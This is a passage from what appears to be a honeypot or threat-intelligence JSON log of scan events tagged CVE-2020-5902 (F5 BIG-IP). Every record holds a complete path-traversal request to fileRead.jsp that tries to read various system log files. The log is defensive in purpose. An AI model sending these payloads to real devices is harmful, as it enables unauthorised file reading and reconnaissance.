856. {
857. "cve": "CVE-2020-5902",
858. "category": "Platform",
859. "description": "F5 BIG-IP Configuration Utility RCE"
860. }
861. ],
862. "event_count": 1,
863. "first_seen": "2020-07-09T08:06:49Z",
864. "last_seen": "2020-07-09T08:06:49Z"
865. },
866. {
867. "event_id": "a29820df1247067d04bf33964e5ef8e529f5ff65cc098eba56da3ffeb8b3b0a7",
868. "source_ip_address": "85.248.227.163",
869. "country": "SK",
870. "user_agent": "python-requests/2.23.0",
871. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql/mysql-slow.log HTTP/1.1",
872. "post_data": "",
873. "target_port": 443,
874. "protocol": "tcp",
875. "tags": [
876. {
877. "cve": "CVE-2020-5902",
878. "category": "Platform",
879. "description": "F5 BIG-IP Configuration Utility RCE"
880. }
881. ],
882. "event_count": 1,
883. "first_seen": "2020-07-09T08:06:48Z",
884. "last_seen": "2020-07-09T08:06:48Z"
885. },
886. {
887. "event_id": "9a7082664225e2718314b0f055868d446e5916dd90c61cc398cbb53953bc4b99",
888. "source_ip_address": "85.248.227.163",
889. "country": "SK",
890. "user_agent": "python-requests/2.23.0",
891. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql/mysql.log HTTP/1.1",
892. "post_data": "",
893. "target_port": 443,
894. "protocol": "tcp",
895. "tags": [
896. {
897. "cve": "CVE-2020-5902",
898. "category": "Platform",
899. "description": "F5 BIG-IP Configuration Utility RCE"
900. }
901. ],
902. "event_count": 1,
903. "first_seen": "2020-07-09T08:06:46Z",
904. "last_seen": "2020-07-09T08:06:46Z"
905. },
906. {
907. "event_id": "e826729509fb231f3f598463406845a8f2c3a96d87de0740c16209600861750f",
908. "source_ip_address": "85.248.227.163",
909. "country": "SK",
910. "user_agent": "python-requests/2.23.0",
911. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql/mysql-bin.log HTTP/1.1",
912. "post_data": "",
913. "target_port": 443,
914. "protocol": "tcp",
915. "tags": [
916. {
917. "cve": "CVE-2020-5902",
918. "category": "Platform",
919. "description": "F5 BIG-IP Configuration Utility RCE"
920. }
921. ],
922. "event_count": 1,
923. "first_seen": "2020-07-09T08:06:45Z",
924. "last_seen": "2020-07-09T08:06:45Z"
925. },
926. {
927. "event_id": "0a8411594e2787f47c345831725db5b2e090d775369b942509ab64365766efeb",
928. "source_ip_address": "85.248.227.163",
929. "country": "SK",
930. "user_agent": "python-requests/2.23.0",
931. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysql.log HTTP/1.1",
932. "post_data": "",
933. "target_port": 443,
934. "protocol": "tcp",
935. "tags": [
936. {
937. "cve": "CVE-2020-5902",
938. "category": "Platform",
939. "description": "F5 BIG-IP Configuration Utility RCE"
940. }
941. ],
942. "event_count": 1,
943. "first_seen": "2020-07-09T08:06:43Z",
944. "last_seen": "2020-07-09T08:06:43Z"
945. },
946. {
947. "event_id": "df7dd29349d1d5af7497b2c9a026c657b6825f97afcc07e6c46fa09675ffabfc",
948. "source_ip_address": "85.248.227.163",
949. "country": "SK",
950. "user_agent": "python-requests/2.23.0",
951. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mysqlderror.log HTTP/1.1",
952. "post_data": "",
953. "target_port": 443,
954. "protocol": "tcp",
955. "tags": [
956. {
957. "cve": "CVE-2020-5902",
958. "category": "Platform",
959. "description": "F5 BIG-IP Configuration Utility RCE"
960. }
961. ],
962. "event_count": 1,
963. "first_seen": "2020-07-09T08:06:42Z",
964. "last_seen": "2020-07-09T08:06:42Z"
965. },
966. {
967. "event_id": "741b94082bf9f14d4480c7389224ab160be07d470a583c9d7b20ba8b2463bd5b",
968. "source_ip_address": "85.248.227.163",
969. "country": "SK",
970. "user_agent": "python-requests/2.23.0",
971. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/messages HTTP/1.1",
972. "post_data": "",
973. "target_port": 443,
974. "protocol": "tcp",
975. "tags": [
976. {
977. "cve": "CVE-2020-5902",
978. "category": "Platform",
979. "description": "F5 BIG-IP Configuration Utility RCE"
980. }
981. ],
982. "event_count": 1,
983. "first_seen": "2020-07-09T08:06:41Z",
984. "last_seen": "2020-07-09T08:06:41Z"
985. },
986. {
987. "event_id": "2dffa1756507e8cd72119ab11dd238ac281ca348f419bf8c5e00dc5ffc9e6db7",
988. "source_ip_address": "85.248.227.163",
989. "country": "SK",
990. "user_agent": "python-requests/2.23.0",
991. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/message HTTP/1.1",
992. "post_data": "",
993. "target_port": 443,
994. "protocol": "tcp",
995. "tags": [
996. {
997. "cve": "CVE-2020-5902",
998. "category": "Platform",
999. "description": "F5 BIG-IP Configuration Utility RCE"
1000. }
1001. ],
1002. "event_count": 1,
1003. "first_seen": "2020-07-09T08:06:39Z",
1004. "last_seen": "2020-07-09T08:06:39Z"
1005. },
1006. {
1007. "event_id": "4144232122e88a18bc1f653db013d12636e85fdefb491fb92ac1959b4bd8fd56",
1008. "source_ip_address": "85.248.227.163",
1009. "country": "SK",
1010. "user_agent": "python-requests/2.23.0",
1011. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mail.warn HTTP/1.1",
1012. "post_data": "",
1013. "target_port": 443,
1014. "protocol": "tcp",
1015. "tags": [
1016. {
1017. "cve": "CVE-2020-5902",
1018. "category": "Platform",
1019. "description": "F5 BIG-IP Configuration Utility RCE"
1020. }
1021. ],
1022. "event_count": 1,
1023. "first_seen": "2020-07-09T08:06:38Z",
1024. "last_seen": "2020-07-09T08:06:38Z"
1025. },
1026. {
1027. "event_id": "e43194a39381e3939b3a24d98a0b7557909dc54efedefb02865f314792ae395e",
1028. "source_ip_address": "85.248.227.163",
1029. "country": "SK",
1030. "user_agent": "python-requests/2.23.0",
1031. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/maillog HTTP/1.1",
1032. "post_data": "",
1033. "target_port": 443,
1034. "protocol": "tcp",
1035. "tags": [
1036. {
1037. "cve": "CVE-2020-5902",
1038. "category": "Platform",
1039. "description": "F5 BIG-IP Configuration Utility RCE"
1040. }
1041. ],
1042. "event_count": 1,
1043. "first_seen": "2020-07-09T08:06:36Z",
1044. "last_seen": "2020-07-09T08:06:36Z"
1045. },
1046. {
1047. "event_id": "1cdac0553c263eeee5cc2c99efacc0296fae45faed1385c1c92509678153eeed",
1048. "source_ip_address": "85.248.227.163",
1049. "country": "SK",
1050. "user_agent": "python-requests/2.23.0",
1051. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mail.log HTTP/1.1",
1052. "post_data": "",
1053. "target_port": 443,
1054. "protocol": "tcp",
1055. "tags": [
1056. {
1057. "cve": "CVE-2020-5902",
1058. "category": "Platform",
1059. "description": "F5 BIG-IP Configuration Utility RCE"
1060. }
1061. ],
1062. "event_count": 1,
1063. "first_seen": "2020-07-09T08:06:35Z",
1064. "last_seen": "2020-07-09T08:06:35Z"
1065. },
1066. {
1067. "event_id": "d7b263fca20d1823bfc57aae5c3f18cfc1d46a301570df2e4fac9e186ba7fb13",
1068. "source_ip_address": "85.248.227.163",
1069. "country": "SK",
1070. "user_agent": "python-requests/2.23.0",
1071. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/mail.info HTTP/1.1",
1072. "post_data": "",
1073. "target_port": 443,
1074. "protocol": "tcp",
1075. "tags": [
1076. {
1077. "cve": "CVE-2020-5902",
1078. "category": "Platform",
1079. "description": "F5 BIG-IP Configuration Utility RCE"
1080. }
1081. ],
1082. "event_count": 1,
1083. "first_seen": "2020-07-09T08:06:33Z",
1084. "last_seen": "2020-07-09T08:06:33Z"
1085. },
1086. {
1087. "event_id": "3346f175b907f12fdcde1117db4c5afd58a450a287906ed03133565ac1000024",
1088. "source_ip_address": "85.248.227.163",
1089. "country": "SK",
1090. "user_agent": "python-requests/2.23.0",
1091. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/lighttpd.error.log HTTP/1.1",
1092. "post_data": "",
1093. "target_port": 443,
1094. "protocol": "tcp",
1095. "tags": [
1096. {
1097. "cve": "CVE-2020-5902",
1098. "category": "Platform",
1099. "description": "F5 BIG-IP Configuration Utility RCE"
1100. }
1101. ],
1102. "event_count": 1,
1103. "first_seen": "2020-07-09T08:06:32Z",
1104. "last_seen": "2020-07-09T08:06:32Z"
1105. },
1106. {
1107. "event_id": "09f84cf487134476879c09141864046a608579b3d5290078853fadd27fff4046",
1108. "source_ip_address": "85.248.227.163",
1109. "country": "SK",
1110. "user_agent": "python-requests/2.23.0",
1111. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/lighttpd.access.log HTTP/1.1",
1112. "post_data": "",
1113. "target_port": 443,
1114. "protocol": "tcp",
1115. "tags": [
1116. {
1117. "cve": "CVE-2020-5902",
1118. "category": "Platform",
1119. "description": "F5 BIG-IP Configuration Utility RCE"
1120. }
1121. ],
1122. "event_count": 1,
1123. "first_seen": "2020-07-09T08:06:31Z",
1124. "last_seen": "2020-07-09T08:06:31Z"
1125. },
1126. {
1127. "event_id": "e64f7a0ff7806e804c16f7085ded6765e04e02305abe2ec73bc073fc7251e911",
1128. "source_ip_address": "85.248.227.163",
1129. "country": "SK",
1130. "user_agent": "python-requests/2.23.0",
1131. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/error.log HTTP/1.1",
1132. "post_data": "",
1133. "target_port": 443,
1134. "protocol": "tcp",
1135. "tags": [
1136. {
1137. "cve": "CVE-2020-5902",
1138. "category": "Platform",
1139. "description": "F5 BIG-IP Configuration Utility RCE"
1140. }
1141. ],
1142. "event_count": 1,
1143. "first_seen": "2020-07-09T08:06:29Z",
1144. "last_seen": "2020-07-09T08:06:29Z"
1145. },
1146. {
1147. "event_id": "d636d8d024b9be88bc8ec8f6135252b4b923784b3232318dc9a2abd5bcb6e7e2",
1148. "source_ip_address": "85.248.227.163",
1149. "country": "SK",
1150. "user_agent": "python-requests/2.23.0",
1151. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lighttpd/access.log HTTP/1.1",
1152. "post_data": "",
1153. "target_port": 443,
1154. "protocol": "tcp",
1155. "tags": [
1156. {
1157. "cve": "CVE-2020-5902",
1158. "category": "Platform",
1159. "description": "F5 BIG-IP Configuration Utility RCE"
1160. }
1161. ],
1162. "event_count": 1,
1163. "first_seen": "2020-07-09T08:06:28Z",
1164. "last_seen": "2020-07-09T08:06:28Z"
1165. },
1166. {
1167. "event_id": "1f435ea382b460e4dfc2b15d2d624bfaa678cb5dc93aaad28bc005e250b90116",
1168. "source_ip_address": "85.248.227.163",
1169. "country": "SK",
1170. "user_agent": "python-requests/2.23.0",
1171. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/lastlog HTTP/1.1",
1172. "post_data": "",
1173. "target_port": 443,
1174. "protocol": "tcp",
1175. "tags": [
1176. {
1177. "cve": "CVE-2020-5902",
1178. "category": "Platform",
1179. "description": "F5 BIG-IP Configuration Utility RCE"
1180. }
1181. ],
1182. "event_count": 1,
1183. "first_seen": "2020-07-09T08:06:26Z",
1184. "last_seen": "2020-07-09T08:06:26Z"
1185. },
1186. {
1187. "event_id": "f985fb061188f9f0cf4da214a032ccbd323cd70dbe2ef4b47a8c4c668cf77c78",
1188. "source_ip_address": "85.248.227.163",
1189. "country": "SK",
1190. "user_agent": "python-requests/2.23.0",
1191. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/kern.log HTTP/1.1",
1192. "post_data": "",
1193. "target_port": 443,
1194. "protocol": "tcp",
1195. "tags": [
1196. {
1197. "cve": "CVE-2020-5902",
1198. "category": "Platform",
1199. "description": "F5 BIG-IP Configuration Utility RCE"
1200. }
1201. ],
1202. "event_count": 1,
1203. "first_seen": "2020-07-09T08:06:25Z",
1204. "last_seen": "2020-07-09T08:06:25Z"
1205. },
1206. {
1207. "event_id": "580fd325745300d081053098a8c51a0934cc8d5c1271ba18b0061af4e10473cb",
1208. "source_ip_address": "85.248.227.163",
1209. "country": "SK",
1210. "user_agent": "python-requests/2.23.0",
1211. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpsd/ssl_log HTTP/1.1",
1212. "post_data": "",
1213. "target_port": 443,
1214. "protocol": "tcp",
1215. "tags": [
1216. {
1217. "cve": "CVE-2020-5902",
1218. "category": "Platform",
1219. "description": "F5 BIG-IP Configuration Utility RCE"
1220. }
1221. ],
1222. "event_count": 1,
1223. "first_seen": "2020-07-09T08:06:23Z",
1224. "last_seen": "2020-07-09T08:06:23Z"
1225. },
1226. {
1227. "event_id": "1bdfe671fff656f1d859b9c57b2b98ea4f3ccb7d6de9130faf8230b56bbf1621",
1228. "source_ip_address": "85.248.227.163",
1229. "country": "SK",
1230. "user_agent": "python-requests/2.23.0",
1231. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpsd/ssl.access_log HTTP/1.1",
1232. "post_data": "",
1233. "target_port": 443,
1234. "protocol": "tcp",
1235. "tags": [
1236. {
1237. "cve": "CVE-2020-5902",
1238. "category": "Platform",
1239. "description": "F5 BIG-IP Configuration Utility RCE"
1240. }
1241. ],
1242. "event_count": 1,
1243. "first_seen": "2020-07-09T08:06:22Z",
1244. "last_seen": "2020-07-09T08:06:22Z"
1245. },
1246. {
1247. "event_id": "9511ca6499ce3919d36b6ce1466b222614a5f2caa8494b2a52ed4105ec2bc069",
1248. "source_ip_address": "85.248.227.163",
1249. "country": "SK",
1250. "user_agent": "python-requests/2.23.0",
1251. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/error.log HTTP/1.1",
1252. "post_data": "",
1253. "target_port": 443,
1254. "protocol": "tcp",
1255. "tags": [
1256. {
1257. "cve": "CVE-2020-5902",
1258. "category": "Platform",
1259. "description": "F5 BIG-IP Configuration Utility RCE"
1260. }
1261. ],
1262. "event_count": 1,
1263. "first_seen": "2020-07-09T08:06:20Z",
1264. "last_seen": "2020-07-09T08:06:20Z"
1265. },
1266. {
1267. "event_id": "7bfa8a7f2f8fdf1dcd54008499de08766d33bd87f13187769714f1c58d33d91f",
1268. "source_ip_address": "85.248.227.163",
1269. "country": "SK",
1270. "user_agent": "python-requests/2.23.0",
1271. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/error_log HTTP/1.1",
1272. "post_data": "",
1273. "target_port": 443,
1274. "protocol": "tcp",
1275. "tags": [
1276. {
1277. "cve": "CVE-2020-5902",
1278. "category": "Platform",
1279. "description": "F5 BIG-IP Configuration Utility RCE"
1280. }
1281. ],
1282. "event_count": 1,
1283. "first_seen": "2020-07-09T08:06:19Z",
1284. "last_seen": "2020-07-09T08:06:19Z"
1285. },
1286. {
1287. "event_id": "0d5a03308cf00e801c6f00e9a4b8719e54abb4609bde19baba58f76d384674b5",
1288. "source_ip_address": "85.248.227.163",
1289. "country": "SK",
1290. "user_agent": "python-requests/2.23.0",
1291. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/access.log HTTP/1.1",
1292. "post_data": "",
1293. "target_port": 443,
1294. "protocol": "tcp",
1295. "tags": [
1296. {
1297. "cve": "CVE-2020-5902",
1298. "category": "Platform",
1299. "description": "F5 BIG-IP Configuration Utility RCE"
1300. }
1301. ],
1302. "event_count": 1,
1303. "first_seen": "2020-07-09T08:06:17Z",
1304. "last_seen": "2020-07-09T08:06:17Z"
1305. },
1306. {
1307. "event_id": "b3cefc3a6353310fefdf7e55cc72016d8843f91836e4ad4ce78c6c7656dcea5d",
1308. "source_ip_address": "85.248.227.163",
1309. "country": "SK",
1310. "user_agent": "python-requests/2.23.0",
1311. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/httpd/access_log HTTP/1.1",
1312. "post_data": "",
1313. "target_port": 443,
1314. "protocol": "tcp",
1315. "tags": [
1316. {
1317. "cve": "CVE-2020-5902",
1318. "category": "Platform",
1319. "description": "F5 BIG-IP Configuration Utility RCE"
1320. }
1321. ],
1322. "event_count": 1,
1323. "first_seen": "2020-07-09T08:06:16Z",
1324. "last_seen": "2020-07-09T08:06:16Z"
1325. },
1326. {
1327. "event_id": "01698b6689243d516e4d4ca715784ac603bd0bdbdb473482f079886c36796567",
1328. "source_ip_address": "85.248.227.163",
1329. "country": "SK",
1330. "user_agent": "python-requests/2.23.0",
1331. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/ftp-proxy/ftp-proxy.log HTTP/1.1",
1332. "post_data": "",
1333. "target_port": 443,
1334. "protocol": "tcp",
1335. "tags": [
1336. {
1337. "cve": "CVE-2020-5902",
1338. "category": "Platform",
1339. "description": "F5 BIG-IP Configuration Utility RCE"
1340. }
1341. ],
1342. "event_count": 1,
1343. "first_seen": "2020-07-09T08:06:14Z",
1344. "last_seen": "2020-07-09T08:06:14Z"
1345. },
1346. {
1347. "event_id": "6da873a28c5d44cc3094114f63660d37b1ce9ac491f2270df34d9ea7ed7d61d8",
1348. "source_ip_address": "85.248.227.163",
1349. "country": "SK",
1350. "user_agent": "python-requests/2.23.0",
1351. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/ftp-proxy HTTP/1.1",
1352. "post_data": "",
1353. "target_port": 443,
1354. "protocol": "tcp",
1355. "tags": [
1356. {
1357. "cve": "CVE-2020-5902",
1358. "category": "Platform",
1359. "description": "F5 BIG-IP Configuration Utility RCE"
1360. }
1361. ],
1362. "event_count": 1,
1363. "first_seen": "2020-07-09T08:06:13Z",
1364. "last_seen": "2020-07-09T08:06:13Z"
1365. },
1366. {
1367. "event_id": "26ce32f9f35b8a436e75ef62d53c6c547e30fcaf394fc0fbbc4d6ca455677079",
1368. "source_ip_address": "85.248.227.163",
1369. "country": "SK",
1370. "user_agent": "python-requests/2.23.0",
1371. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/ftplog HTTP/1.1",
1372. "post_data": "",
1373. "target_port": 443,
1374. "protocol": "tcp",
1375. "tags": [
1376. {
1377. "cve": "CVE-2020-5902",
1378. "category": "Platform",
1379. "description": "F5 BIG-IP Configuration Utility RCE"
1380. }
1381. ],
1382. "event_count": 1,
1383. "first_seen": "2020-07-09T08:06:11Z",
1384. "last_seen": "2020-07-09T08:06:11Z"
1385. },
1386. {
1387. "event_id": "a4c009fca5769ad48a58d958684060d4a33638d614f9361f53f66b752483d45c",
1388. "source_ip_address": "85.248.227.163",
1389. "country": "SK",
1390. "user_agent": "python-requests/2.23.0",
1391. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/faillog HTTP/1.1",
1392. "post_data": "",
1393. "target_port": 443,
1394. "protocol": "tcp",
1395. "tags": [
1396. {
1397. "cve": "CVE-2020-5902",
1398. "category": "Platform",
1399. "description": "F5 BIG-IP Configuration Utility RCE"
1400. }
1401. ],
1402. "event_count": 1,
1403. "first_seen": "2020-07-09T08:06:09Z",
1404. "last_seen": "2020-07-09T08:06:09Z"
1405. },
1406. {
1407. "event_id": "6562f47cf2935e67a6147f46990404e56ccbe076224d7bc20e02a5dfb4a4a1a3",
1408. "source_ip_address": "85.248.227.163",
1409. "country": "SK",
1410. "user_agent": "python-requests/2.23.0",
1411. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim/rejectlog HTTP/1.1",
1412. "post_data": "",
1413. "target_port": 443,
1414. "protocol": "tcp",
1415. "tags": [
1416. {
1417. "cve": "CVE-2020-5902",
1418. "category": "Platform",
1419. "description": "F5 BIG-IP Configuration Utility RCE"
1420. }
1421. ],
1422. "event_count": 1,
1423. "first_seen": "2020-07-09T08:06:08Z",
1424. "last_seen": "2020-07-09T08:06:08Z"
1425. },
1426. {
1427. "event_id": "fcefde5da3894863f2e82ceaa65177bbcae16cb617e53f5f10aa0ab9408cf0da",
1428. "source_ip_address": "85.248.227.163",
1429. "country": "SK",
1430. "user_agent": "python-requests/2.23.0",
1431. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim_rejectlog HTTP/1.1",
1432. "post_data": "",
1433. "target_port": 443,
1434. "protocol": "tcp",
1435. "tags": [
1436. {
1437. "cve": "CVE-2020-5902",
1438. "category": "Platform",
1439. "description": "F5 BIG-IP Configuration Utility RCE"
1440. }
1441. ],
1442. "event_count": 1,
1443. "first_seen": "2020-07-09T08:06:06Z",
1444. "last_seen": "2020-07-09T08:06:06Z"
1445. },
1446. {
1447. "event_id": "fe0e25cf2feb12fd54d6e1a35381b398f030ddaa4e1514f66cec5560eb9182c8",
1448. "source_ip_address": "85.248.227.163",
1449. "country": "SK",
1450. "user_agent": "python-requests/2.23.0",
1451. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim.paniclog HTTP/1.1",
1452. "post_data": "",
1453. "target_port": 443,
1454. "protocol": "tcp",
1455. "tags": [
1456. {
1457. "cve": "CVE-2020-5902",
1458. "category": "Platform",
1459. "description": "F5 BIG-IP Configuration Utility RCE"
1460. }
1461. ],
1462. "event_count": 1,
1463. "first_seen": "2020-07-09T08:06:04Z",
1464. "last_seen": "2020-07-09T08:06:04Z"
1465. },
1466. {
1467. "event_id": "9219b3b0903941ae4c9cfff647e9bd5bdefbedb3d41cacbf84ee23dd0bd46e38",
1468. "source_ip_address": "85.248.227.163",
1469. "country": "SK",
1470. "user_agent": "python-requests/2.23.0",
1471. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim_paniclog HTTP/1.1",
1472. "post_data": "",
1473. "target_port": 443,
1474. "protocol": "tcp",
1475. "tags": [
1476. {
1477. "cve": "CVE-2020-5902",
1478. "category": "Platform",
1479. "description": "F5 BIG-IP Configuration Utility RCE"
1480. }
1481. ],
1482. "event_count": 1,
1483. "first_seen": "2020-07-09T08:06:02Z",
1484. "last_seen": "2020-07-09T08:06:02Z"
1485. },
1486. {
1487. "event_id": "f67150546bc02ad1910fb11fa269f3f56d76e22d4244a36fd233073fe065d017",
1488. "source_ip_address": "85.248.227.163",
1489. "country": "SK",
1490. "user_agent": "python-requests/2.23.0",
1491. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim/mainlog HTTP/1.1",
1492. "post_data": "",
1493. "target_port": 443,
1494. "protocol": "tcp",
1495. "tags": [
1496. {
1497. "cve": "CVE-2020-5902",
1498. "category": "Platform",
1499. "description": "F5 BIG-IP Configuration Utility RCE"
1500. }
1501. ],
1502. "event_count": 1,
1503. "first_seen": "2020-07-09T08:06:01Z",
1504. "last_seen": "2020-07-09T08:06:01Z"
1505. },
1506. {
1507. "event_id": "a3fe6b834229be8d3628b14e5e1709cd6dc916f478bc809b73f4948e6cba5f7d",
1508. "source_ip_address": "85.248.227.163",
1509. "country": "SK",
1510. "user_agent": "python-requests/2.23.0",
1511. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/exim_mainlog HTTP/1.1",
1512. "post_data": "",
1513. "target_port": 443,
1514. "protocol": "tcp",
1515. "tags": [
1516. {
1517. "cve": "CVE-2020-5902",
1518. "category": "Platform",
1519. "description": "F5 BIG-IP Configuration Utility RCE"
1520. }
1521. ],
1522. "event_count": 1,
1523. "first_seen": "2020-07-09T08:05:59Z",
1524. "last_seen": "2020-07-09T08:05:59Z"
1525. },
1526. {
1527. "event_id": "2713a7465e16b3e3a42536be90d04a27fe3542f6c3c624b4277e7d32d90da045",
1528. "source_ip_address": "85.248.227.163",
1529. "country": "SK",
1530. "user_agent": "python-requests/2.23.0",
1531. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/dpkg.log HTTP/1.1",
1532. "post_data": "",
1533. "target_port": 443,
1534. "protocol": "tcp",
1535. "tags": [
1536. {
1537. "cve": "CVE-2020-5902",
1538. "category": "Platform",
1539. "description": "F5 BIG-IP Configuration Utility RCE"
1540. }
1541. ],
1542. "event_count": 1,
1543. "first_seen": "2020-07-09T08:05:58Z",
1544. "last_seen": "2020-07-09T08:05:58Z"
1545. },
1546. {
1547. "event_id": "4b5a132aa60808bb5f7e4efc984fedd49a62fbf12c61c4c678eca9088a9237ee",
1548. "source_ip_address": "85.248.227.163",
1549. "country": "SK",
1550. "user_agent": "python-requests/2.23.0",
1551. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/dmesg HTTP/1.1",
1552. "post_data": "",
1553. "target_port": 443,
1554. "protocol": "tcp",
1555. "tags": [
1556. {
1557. "cve": "CVE-2020-5902",
1558. "category": "Platform",
1559. "description": "F5 BIG-IP Configuration Utility RCE"
1560. }
1561. ],
1562. "event_count": 1,
1563. "first_seen": "2020-07-09T08:05:57Z",
1564. "last_seen": "2020-07-09T08:05:57Z"
1565. },
1566. {
1567. "event_id": "8bd3cd34f120d5829c46116be9ab7af32a492099c31df8124ea1a81937ff22b8",
1568. "source_ip_address": "85.248.227.163",
1569. "country": "SK",
1570. "user_agent": "python-requests/2.23.0",
1571. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/debug HTTP/1.1",
1572. "post_data": "",
1573. "target_port": 443,
1574. "protocol": "tcp",
1575. "tags": [
1576. {
1577. "cve": "CVE-2020-5902",
1578. "category": "Platform",
1579. "description": "F5 BIG-IP Configuration Utility RCE"
1580. }
1581. ],
1582. "event_count": 1,
1583. "first_seen": "2020-07-09T08:05:55Z",
1584. "last_seen": "2020-07-09T08:05:55Z"
1585. },
1586. {
1587. "event_id": "e1a1cf8795fc52d7d96814df47cd6914d9b699cebb4a18f98ca03f15a4897eb7",
1588. "source_ip_address": "85.248.227.163",
1589. "country": "SK",
1590. "user_agent": "python-requests/2.23.0",
1591. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/daemon.log HTTP/1.1",
1592. "post_data": "",
1593. "target_port": 443,
1594. "protocol": "tcp",
1595. "tags": [
1596. {
1597. "cve": "CVE-2020-5902",
1598. "category": "Platform",
1599. "description": "F5 BIG-IP Configuration Utility RCE"
1600. }
1601. ],
1602. "event_count": 1,
1603. "first_seen": "2020-07-09T08:05:54Z",
1604. "last_seen": "2020-07-09T08:05:54Z"
1605. },
1606. {
1607. "event_id": "97cea31afa09d180206e57c3dbc357beeb6701602bb82aeeb115456a7d4b2eb0",
1608. "source_ip_address": "85.248.227.163",
1609. "country": "SK",
1610. "user_agent": "python-requests/2.23.0",
1611. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/cups/error.log HTTP/1.1",
1612. "post_data": "",
1613. "target_port": 443,
1614. "protocol": "tcp",
1615. "tags": [
1616. {
1617. "cve": "CVE-2020-5902",
1618. "category": "Platform",
1619. "description": "F5 BIG-IP Configuration Utility RCE"
1620. }
1621. ],
1622. "event_count": 1,
1623. "first_seen": "2020-07-09T08:05:52Z",
1624. "last_seen": "2020-07-09T08:05:52Z"
1625. },
1626. {
1627. "event_id": "fdc2e7400dd47073230eab19bacd57a318c6225c9e584d801600a2545de54312",
1628. "source_ip_address": "85.248.227.163",
1629. "country": "SK",
1630. "user_agent": "python-requests/2.23.0",
1631. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/log/chttp.log HTTP/1.1",
1632. "post_data": "",
1633. "target_port": 443,
1634. "protocol": "tcp",
1635. "tags": [
1636. {
1637. "cve": "CVE-2020-5902",
1638. "category": "Platform",
1639. "description": "F5 BIG-IP Configuration Utility RCE"
1640. }
1641. ],
1642. "event_count": 1,
1643. "first_seen": "2020-07-09T08:05:51Z",
1644. "last_seen": "2020-07-09T08:05:51Z"
1645. },
1646. {
1647. "event_id": "83cc5e21e37acfe3255cfd841fe3a7b1c3cb7c3d7fc7b78bc27376858ae43960",
1648. "source_ip_address": "85.248.227.163",
1649. "country": "SK",
1650. "user_agent": "python-requests/2.23.0",
1651. "payload": "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/var/htmp HTTP/1.1",
1652. "post_data": "",
1653. "target_port": 443,
1654. "protocol": "tcp",
1655. "tags": [
1656. {
1657. "cve": "CVE-2020-5902",
1658. "category": "Platform",
1659. "description": "F5 BIG-IP Configuration Utility RCE"
1660. }
1661. ],
1662. "event_count": 1,
1663. "first_seen": "2020-07-09T08:05:49Z",
1664. "last_seen": "2020-07-09T08:05:49Z"
1665. },
1666. {
1667. "event_id": "e07736941570227d24b6bba891907afd1b1f71fca5ba58ffad029e85cf362dc8",
1668. "source_ip_address": "85.248.227.163",
1669. "country": "SK",
